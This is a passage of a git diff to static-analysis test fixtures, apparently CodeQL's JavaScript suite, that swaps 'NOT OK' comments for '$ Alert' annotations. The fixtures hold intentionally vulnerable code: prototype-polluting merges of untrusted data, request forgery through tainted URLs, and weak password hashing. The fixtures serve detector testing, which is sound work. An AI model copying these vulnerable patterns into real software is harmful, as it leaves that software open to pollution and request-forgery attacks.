(!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // NOT OK - object literal can flow here + map[key1][key2] = value; // $ Alert - object literal can flow here } function deepSetCallerBad(data) { @@ -254,7 +254,7 @@ function mergeWithCopy(dst, src) { let result = maybeCopy(dst); for (let key in src) { if (src.hasOwnProperty(key)) { - result[key] = mergeWithCopy(dst[key], src[key]); // OK + result[key] = mergeWithCopy(dst[key], src[key]); } } return result; @@ -267,7 +267,7 @@ function copyUsingEntries(dst, src) { if (dst[key]) { copyUsingEntries(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -277,7 +277,7 @@ function copyUsingReflect(dst, src) { if (dst[key]) { copyUsingReflect(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -290,7 +290,7 @@ function copyWithPath(dst, src, path) { } else { let target = {}; target[path] = {}; - target[path][key] = src[key]; // OK + target[path][key] = src[key]; doSomething(target); } } @@ -305,7 +305,7 @@ function typeofObjectTest(dst, src) { if (dst[key] && typeof value === 'object') { typeofObjectTest(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -319,7 +319,7 @@ function mergeRephinementNode(dst, src) { if (dst[key] && typeof value === 'object') { mergeRephinementNode(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -354,7 +354,7 @@ function mergePlainObjectsOnly(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnly(target[key], source[key], options); } else { - target[key] = source[key]; // OK - but flagged anyway due to imprecise barrier for captured variable + target[key] = source[key]; // $ SPURIOUS: Alert - due to imprecise barrier for captured variable } }); } @@ -370,7 +370,7 @@ function mergePlainObjectsOnlyNoClosure(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnlyNoClosure(target[key], source[key], options); } else { - target[key] = source[key]; // OK + target[key] = source[key]; } } } @@ -390,7 +390,7 @@ function mergeUsingCallback(dst, src) { if (dst[key]) { mergeUsingCallback(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK - but not currently flagged + dst[key] = src[key]; // $ MISSING: Alert } }); } @@ -400,7 +400,7 @@ function mergeUsingCallback2(dst, src) { if (dst[key]) { mergeUsingCallback2(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -416,7 +416,7 @@ function copyUsingWrappedRead(dst, src) { if (target) { copyUsingWrappedRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -433,7 +433,7 @@ function copyUsingAlmostSafeRead(dst, src) { if (target) { copyUsingAlmostSafeRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -450,7 +450,7 @@ function copyUsingSafeRead(dst, src) { if (target) { copyUsingSafeRead(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -462,9 +462,9 @@ function copyUsingForOwn(dst, src) { copyUsingForOwn(dst[key], src[key]); } else { // Handle a few different ways to access src[key] - if (something()) dst[key] = src[key]; // NOT OK - if (something()) dst[key] = o[key]; // NOT OK - if (something()) dst[key] = value; // NOT OK + if (something()) dst[key] = src[key]; // $ Alert + if (something()) dst[key] = o[key]; // $ Alert + if (something()) dst[key] = value; // $ Alert } }); } @@ -474,7 +474,7 @@ function copyUsingUnderscoreOrLodash(dst, src) { if (dst[key]) { copyUsingUnderscoreOrLodash(dst[key], src[key]); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -486,7 +486,7 @@ function copyPlainObject(dst, src) { if (dst[key] && isPlainObject(src)) { copyPlainObject(dst[key], src[key]); } else { - dst[key] = src[key]; // OK - but flagged anyway + dst[key] = src[key]; // $ SPURIOUS: Alert } } } @@ -499,7 +499,7 @@ function copyPlainObject2(dst, src) { if (isPlainObject(target) && isPlainObject(value)) { copyPlainObject2(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -514,7 +514,7 @@ function usingDefineProperty(dst, src) { } else { var descriptor = {}; descriptor.value = src[key]; - Object.defineProperty(dst, key, descriptor); // NOT OK + Object.defineProperty(dst, key, descriptor); // $ Alert } } } @@ -526,7 +526,7 @@ function copyUsingForInAndRest(...args) { if (dst[key]) { copyUsingForInAndRest(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -544,7 +544,7 @@ function mergeUsingCallback3(dst, src) { if (dst[key]) { mergeUsingCallback3(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -556,7 +556,7 @@ function copyHasOwnProperty2(dst, src) { if (Object.hasOwn(dst, key)) { copyHasOwnProperty2(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -568,7 +568,7 @@ function copyHasOwnProperty3(dst, src) { if (_.has(dst, key)) { copyHasOwnProperty3(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -602,7 +602,7 @@ function merge_captureBarrier(dest, source) { if (dest[key]) { merge_captureBarrier(dest[key], source[key]); } else { - dest[key] = captureBarrier(source[key]); // OK - but currently flagged anyway + dest[key] = captureBarrier(source[key]); // $ SPURIOUS: Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js index 041d9adf02fc..a8fdfde4f382 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js @@ -1,3 +1,3 @@ addEventListener("message", (event) => { - angular.merge({}, JSON.parse(event.data)); // NOT OK + angular.merge({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js index ba7d026b9cd9..8e50da57e315 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js @@ -4,5 +4,5 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // OK + _.merge({}, req.query.foo); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index b1da6d9ab05d..8111eb36d94a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -4,17 +4,17 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // NOT OK - _.merge({}, req.query); // NOT OK - but not flagged + _.merge({}, req.query.foo); // $ Alert + _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // NOT OK + value: req.query.value // $ Alert }); let opts = { thing: req.query.value // wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // NOT OK + value: opts.thing // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html index 02d6d086d547..47c340cb8784 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html @@ -1,7 +1,7 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js index acbfa2acbb42..5b1b7a277081 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js @@ -1,6 +1,6 @@ import * as webix from "webix"; addEventListener("message", (event) => { - webix.extend({}, JSON.parse(event.data)); // NOT OK - webix.copy({}, JSON.parse(event.data)); // NOT OK + webix.extend({}, JSON.parse(event.data)); // $ Alert + webix.copy({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-916/tst.js b/javascript/ql/test/query-tests/Security/CWE-916/tst.js index c5f1c31127a8..d41c6b719a18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-916/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-916/tst.js @@ -1,9 +1,9 @@ var password = "secret"; -require("bcrypt").hash(password); // OK +require("bcrypt").hash(password); -require('crypto').createCipher('aes192').write(password); // NOT OK +require('crypto').createCipher('aes192').write(password); // $ Alert -require('crypto').createHash('sha256').write(password); // NOT OK +require('crypto').createHash('sha256').write(password); // $ Alert -require('crypto').createHash('md5').write(password); // NOT OK +require('crypto').createHash('md5').write(password); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index c55270377ede..a8d7d429cf86 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js @@ -9,17 +9,17 @@ export function MyComponent() { request(params.foo); // Possibly problematic, but not currently flagged. const query = window.location.search.substring(1); - request('https://example.com/api/' + query + '/id'); // NOT OK - request('https://example.com/api?q=' + query); // OK + request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + query); request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway const fragment = window.location.hash.substring(1); - request('https://example.com/api/' + fragment + '/id'); // NOT OK - request('https://example.com/api?q=' + fragment); // OK + request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + fragment); const name = window.name; - request('https://example.com/api/' + name + '/id'); // NOT OK - request('https://example.com/api?q=' + name); // OK + request('https://example.com/api/' + name + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + name); - request(window.location.href + '?q=123'); // OK + request(window.location.href + '?q=123'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 7b4c792bb366..50a7fe976998 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -13,40 +13,40 @@ let Uri = goog.require('goog.Uri'); var server = http.createServer(function(req, res) { var tainted = url.parse(req.url, true).query.url; - request("example.com"); // OK + request("example.com"); - request(tainted); // NOT OK + request(tainted); // $ Alert[js/request-forgery] - request.get(tainted); // NOT OK + request.get(tainted); // $ Alert[js/request-forgery] var options = {}; - options.url = tainted; // NOT OK + options.url = tainted; // $ Alert request(options); - request("http://" + tainted); // NOT OK + request("http://" + tainted); // $ Alert[js/request-forgery] - request("http://example.com" + tainted); // NOT OK + request("http://example.com" + tainted); // $ Alert[js/request-forgery] - request("http://example.com/" + tainted); // NOT OK + request("http://example.com/" + tainted); // $ Alert[js/request-forgery] - request("http://example.com/?" + tainted); // OK + request("http://example.com/?" + tainted); - http.get(relativeUrl, {host: tainted}); // NOT OK + http.get(relativeUrl, {host: tainted}); // $ Alert[js/request-forgery] - XhrIo.send(new Uri(tainted)); // NOT OK - new XhrIo().send(new Uri(tainted)); // NOT OK + XhrIo.send(new Uri(tainted)); // $ Alert[js/request-forgery] + new XhrIo().send(new Uri(tainted)); // $ Alert[js/request-forgery] let base = require('./config').base; - request(`http://example.com/${base}/${tainted}`); // NOT OK + request(`http://example.com/${base}/${tainted}`); // $ Alert[js/request-forgery] - request(`http://example.com/${base}/v1/${tainted}`); // NOT OK + request(`http://example.com/${base}/v1/${tainted}`); // $ Alert[js/request-forgery] - request('http://example.com/' + base + '/' + tainted); // NOT OK + request('http://example.com/' + base + '/' + tainted); // $ Alert[js/request-forgery] - request('http://example.com/' + base + ('/' + tainted)); // NOT OK - but not flagged [INCONSISTENCY] + request('http://example.com/' + base + ('/' + tainted)); // $ MISSING: Alert - request(`http://example.com/?${base}/${tainted}`); // OK + request(`http://example.com/?${base}/${tainted}`); request(`http://example.com/${base}${tainted}`); // OK - assumed safe @@ -58,14 +58,14 @@ var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; var client = await CDP(options); - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] CDP(options).catch((ignored) => {}).then((client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] }) CDP(options, (client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] }); }) @@ -73,7 +73,7 @@ import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; - JSDOM.fromURL(tainted); // NOT OK + JSDOM.fromURL(tainted); // $ Alert[js/request-forgery] }); var route = require('koa-route'); @@ -81,15 +81,15 @@ var Koa = require('koa'); var app = new Koa(); app.use(route.get('/pets', (context, param1, param2, param3) => { - JSDOM.fromURL(param1); // NOT OK + JSDOM.fromURL(param1); // $ Alert[js/request-forgery] })); const router = require('koa-router')(); const app = new Koa(); router.get('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] }).post('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] }); app.use(router.routes()); @@ -97,7 +97,7 @@ import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; - new WebSocket(tainted); // NOT OK + new WebSocket(tainted); // $ Alert[js/request-forgery] }); @@ -124,12 +124,12 @@ var server2 = http.createServer(function(req, res) { axios({ method: 'get', - url: tainted // NOT OK + url: tainted // $ Alert }) var myUrl = `${something}/bla/${tainted}`; - axios.get(myUrl); // NOT OK + axios.get(myUrl); // $ Alert[js/request-forgery] var myEncodedUrl = `${something}/bla/${encodeURIComponent(tainted)}`; - axios.get(myEncodedUrl); // OK + axios.get(myEncodedUrl); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js index 1b66865ea21c..683ca49fcafb 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js @@ -1,5 +1,4 @@ -// NOT OK -while(c){ +while(c){ // $ Alert switch(c){ case "/": break; @@ -8,8 +7,7 @@ while(c){ break; } -// NOT OK -function f() { +function f() { // $ Alert for (; k < numprecincts;) { var packet = createPacket(resolution, k, l); k++; @@ -17,14 +15,14 @@ function f() { } } -// OK + var oHasProps = false; for (var p in o) { oHasProps = true; break; } -// OK + while(c){ if (c === '"') break; diff --git a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js index 47efe8c1cb6c..adbd85cf6157 100644 --- a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js +++ b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js @@ -1,8 +1,8 @@ var arr = [1,2,3]; -arr.concat([1,2,3]); // NOT OK! +arr.concat([1,2,3]); // $ Alert -arr.concat(arr); // NOT OK! +arr.concat(arr); // $ Alert console.log(arr.concat([1,2,3])); diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js index 114db4ed8d3e..35338b7bed10 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js +++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js @@ -1,17 +1,16 @@ -// NOT OK -function f() { +function f() { // $ Alert if (foo()) return true; } -// OK + function g() { if (foo()) return true; return false; } -// OK + function h() { open(); try { @@ -21,7 +20,7 @@ function h() { } } -// OK + function k(x) { switch (x) { case 1: @@ -31,20 +30,20 @@ function k(x) { } } -// OK + function l() { return 23; alert("Hi"); } -// OK + function m() { if (foo()) return true; throw new Error("not foo!"); } -// OK + function n() { if (foo()) return true; @@ -60,7 +59,7 @@ function foo() { } // -// OK: dual-use constructor +// OK - dual-use constructor function Point(x, y) { if (!(this instanceof Point)) return new Point(x, y); @@ -68,7 +67,7 @@ function Point(x, y) { this.y = y; } -// OK: infinite loops +// OK - infinite loops function q(n) { for (var i=0;;++i) if (i>2*n) @@ -96,14 +95,12 @@ function t(n) { } while("true"); } -// NOT OK -var u = function() { +var u = function() { // $ Alert if (foo()) return true; }; -// NOT OK -function v(b) { +function v(b) { // $ Alert if (b) return 1; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js index f2331a705bdf..990179e6200a 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js @@ -1,19 +1,16 @@ -// OK + for (j = i - 1; j >= 0; --j) { } -// NOT OK -for (j = i + 1; j < strLength; --j) { +for (j = i + 1; j < strLength; --j) { // $ Alert } -// NOT OK -for (var i = 0, l = c.length; i > l; i ++) { +for (var i = 0, l = c.length; i > l; i ++) { // $ Alert } -// OK + for (i=lower-1; i>=0; --i) a[i] = 0; -// NOT OK -for (i=upper+1; i5; --i) + for (var j=i; i>5; --i) // $ Alert f(i, j); - // OK + for (var k=0; k Foo
    Click me
    -
    Click me
    +
    Click me
    \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7b9968115f5e..7f4296932d96 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -17,17 +17,17 @@ console.log(returnsValue()) console.log(stub()) - console.log(onlySideEffects()); // Not OK! + console.log(onlySideEffects()); // $ Alert - var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK! A is never used. + var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. var b = onlySideEffects(); console.log(b); - var c = 42 + (onlySideEffects(), 42); // OK, value is thrown away. + var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. console.log(c); - var d = 42 + (42, onlySideEffects()); // NOT OK! + var d = 42 + (42, onlySideEffects()); // $ Alert console.log(d); if (onlySideEffects()) { @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // NOT OK! + var e = myObj.onlySideEffects.apply(this, arguments); // $ Alert console.log(e); function onlySideEffects2() { @@ -50,11 +50,11 @@ } var bothOnlyHaveSideEffects = Math.random() > 0.5 ? onlySideEffects : onlySideEffects2; - var f = bothOnlyHaveSideEffects(); // NOT OK! + var f = bothOnlyHaveSideEffects(); // $ Alert console.log(f); var oneOfEach = Math.random() > 0.5 ? onlySideEffects : returnsValue; - var g = oneOfEach(); // OK + var g = oneOfEach(); console.log(g); function alwaysThrows() { @@ -66,28 +66,28 @@ throw new Error("Important error!") } - var h = returnsValue() || alwaysThrows(); // OK! + var h = returnsValue() || alwaysThrows(); console.log(h); function equals(x, y) { return x === y; } - var foo = [1,2,3].filter(n => {equals(n, 3)}) // NOT OK! + var foo = [1,2,3].filter(n => {equals(n, 3)}) // $ Alert console.log(foo); import { filter } from 'lodash' - var bar = filter([1,2,4], x => { equals(x, 3) } ) // NOT OK! + var bar = filter([1,2,4], x => { equals(x, 3) } ) // $ Alert console.log(bar); - var baz = [1,2,3].filter(n => {n === 3}) // OK + var baz = [1,2,3].filter(n => {n === 3}) console.log(baz); class Deferred { } - new Deferred().resolve(onlySideEffects()); // OK + new Deferred().resolve(onlySideEffects()); Promise.all([onlySideEffects(), onlySideEffects()]) })(); @@ -104,16 +104,16 @@ class Foo { class Bar extends Foo { constructor() { - console.log(super()); // OK. + console.log(super()); } } () => { let equals = (x, y) => { return x === y; }; - var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // $ Alert console.log(foo); - var foo = [1,2,3].findLast(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLast(n => { equals(n, 3); }) // $ Alert console.log(foo); } diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts index 6da3bde4bf01..758b4480c64e 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts @@ -3,4 +3,4 @@ declare function returnsSomething(): number; console.log(returnsSomething()); -console.log(returnsVoid()); // NOT OK! \ No newline at end of file +console.log(returnsVoid()); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js index aa5ee0e1fb5b..dd0468451930 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js @@ -1,4 +1,4 @@ function f() { - if (1 > 2) {} else {} // NOT OK - always false - if (1 > 0) {} else {} // NOT OK - always true + if (1 > 2) {} else {} // $ Alert - always false + if (1 > 0) {} else {} // $ Alert - always true } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js index a40fc483a06c..f16d5a000a22 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js @@ -1,11 +1,11 @@ function defaultParam(param = 0) { - if (param > 0) {} // OK + if (param > 0) {} } function defaultPattern(obj, arr) { let { prop = 0 } = obj; - if (prop > 0) {} // OK + if (prop > 0) {} let [ elm = 0 ] = arr; - if (elm > 0) {} // OK + if (elm > 0) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js index 7e198d0e0293..a8064ae69429 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js @@ -2,5 +2,5 @@ function test() { let x = (function() { if (g) return 5; })(); - if (x + 1 < 5) {} // OK + if (x + 1 < 5) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index fe4bb6486ce0..d698b7d1c29e 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -30,7 +30,7 @@ function test(a, b) { if ((new X())){} x = 0n; - if (x) // NOT OK + if (x) // $ Alert ; } @@ -40,7 +40,7 @@ async function awaitFlow(){ if (y) v = await f() - if (v) { // OK + if (v) { } } @@ -57,29 +57,29 @@ async function awaitFlow(){ var unknown = unknownF(); if (unknown) return; - if (unknown) // NOT OK + if (unknown) // $ Alert return; }); (function (...x) { - x || y // NOT OK + x || y // $ Alert }); (function() { function f1(x) { - x || y // NOT OK, but whitelisted + x || y // $ Alert - but whitelisted } f1(true); function f2(x) { while (true) - x || y // NOT OK + x || y // $ Alert } f2(true); function f3(x) { (function(){ - x || y // NOT OK, but whitelisted + x || y // $ Alert - but whitelisted }); } f3(true); @@ -91,52 +91,52 @@ async function awaitFlow(){ (function (x, y) { if (!x) { - while (x) { // NOT OK + while (x) { // $ Alert f(); } - while (true) { // OK + while (true) { break; } - if (true && true) {} // NOT OK - if (y && x) {} // NOT OK - if (y && (x)) {} // NOT OK - do { } while (x); // NOT OK + if (true && true) {} // $ Alert + if (y && x) {} // $ Alert + if (y && (x)) {} // $ Alert + do { } while (x); // $ Alert } }); (function(x,y) { - let obj = (x && {}) || y; // OK - if ((x && {}) || y) {} // NOT OK + let obj = (x && {}) || y; + if ((x && {}) || y) {} // $ Alert }); (function(){ function constantFalse1() { return false; } - if (constantFalse1()) // OK + if (constantFalse1()) return; function constantFalse2() { return false; } let constantFalse = unknown? constantFalse1 : constantFalse2; - if (constantFalse2()) // OK + if (constantFalse2()) return; function constantUndefined() { return undefined; } - if (constantUndefined()) // NOT OK + if (constantUndefined()) // $ Alert return; function constantFalseOrUndefined1() { return unknown? false: undefined; } - if (constantFalseOrUndefined1()) // NOT OK + if (constantFalseOrUndefined1()) // $ Alert return; let constantFalseOrUndefined2 = unknown? constantFalse1 : constantUndefined; - if (constantFalseOrUndefined2()) // NOT OK + if (constantFalseOrUndefined2()) // $ Alert return; }); @@ -145,12 +145,12 @@ async function awaitFlow(){ function p() { return {}; } - if (p()) { // NOT OK + if (p()) { // $ Alert } var v = p(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ Alert - but not detected due to SSA limitations } }); @@ -160,12 +160,12 @@ async function awaitFlow(){ if (e) return e; throw new Error(); } - if(findOrThrow()){ // NOT OK + if(findOrThrow()){ // $ Alert } var v = findOrThrow(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ Alert - but not detected due to SSA limitations } }); @@ -173,14 +173,14 @@ async function awaitFlow(){ function f(){ return { v: unkown };} f(); var { v } = f(); - if (v) { // OK + if (v) { } }); (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // NOT OK, but whitelisted + if (!x && something()) { // $ Alert - but whitelisted something(); } }); diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js index 7b3888c982a4..74e2c0f2439f 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js @@ -11,90 +11,90 @@ function getLastLine(input) { function f1() { return false } - if(f1()){} // OK, whitelisted + if(f1()){} // OK - whitelisted function f2() { return false } - if(!f2()){} // OK, whitelisted + if(!f2()){} // OK - whitelisted function f3() { return false } - if(!!f3()){} // OK, whitelisted + if(!!f3()){} // OK - whitelisted function f4() { return false } - if(f4() || o.p){} // OK, whitelisted + if(f4() || o.p){} // OK - whitelisted function f5() { return false } var v5 = f5(); - if(v5){} // OK, whitelisted + if(v5){} // OK - whitelisted function f6() { return false } var v6 = f6(); - if(!!v6){} // OK, whitelisted + if(!!v6){} // OK - whitelisted })(); (function tooGeneralFunctions(){ function f1(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f1(undefined); f1({}); function f2(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f2(undefined); function f3(x1) { var x2 = x1; - if(x2){} // NOT OK, not whitelisted + if(x2){} // $ Alert - not whitelisted } f3(undefined); function f4(x) { - if(x && o.p){} // OK, whitelisted + if(x && o.p){} // OK - whitelisted } f4(undefined); function f5(x, y) { var xy = o.q? x: y; - if(xy && o.p){} // NOT OK, not whitelisted + if(xy && o.p){} // $ Alert - not whitelisted } f5(undefined, undefined); function f6(x) { - if(!x){} // OK, whitelisted + if(!x){} // OK - whitelisted } f6(true); function f7(x) { - if(!!x){} // OK, whitelisted + if(!!x){} // OK - whitelisted } f7(true); function f8(x, y) { var xy = x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f8(undefined, undefined); function f9(x, y) { var xy = !x || y; - if(xy){} // OK, whitelisted + if(xy){} // OK - whitelisted } f9(undefined, undefined); function f10(x, y) { var xy = !!x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f10(undefined, undefined); @@ -103,7 +103,7 @@ function getLastLine(input) { (function(){ function g(p) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted g(p); } }; @@ -111,7 +111,7 @@ function getLastLine(input) { function f(p = false) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted f(p); } }; @@ -119,7 +119,7 @@ function getLastLine(input) { function h(p = false) { (function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted } }); diff --git a/javascript/ql/test/query-tests/Vue/tst.js b/javascript/ql/test/query-tests/Vue/tst.js index 27fe31488cbf..f0889596112a 100644 --- 